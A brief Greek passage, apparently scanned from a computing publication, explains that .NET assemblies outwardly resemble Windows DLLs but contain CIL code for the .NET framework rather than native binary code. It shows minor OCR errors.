DLLs των Windows. Στο εσωτερικὀ του, ωστόσο, δια- 
φοροποιείται σε μεγάλο βαθμό. Αντί για κώδικα binary 
περιέχει κώδικα CIL, yia ro .Net framework. 
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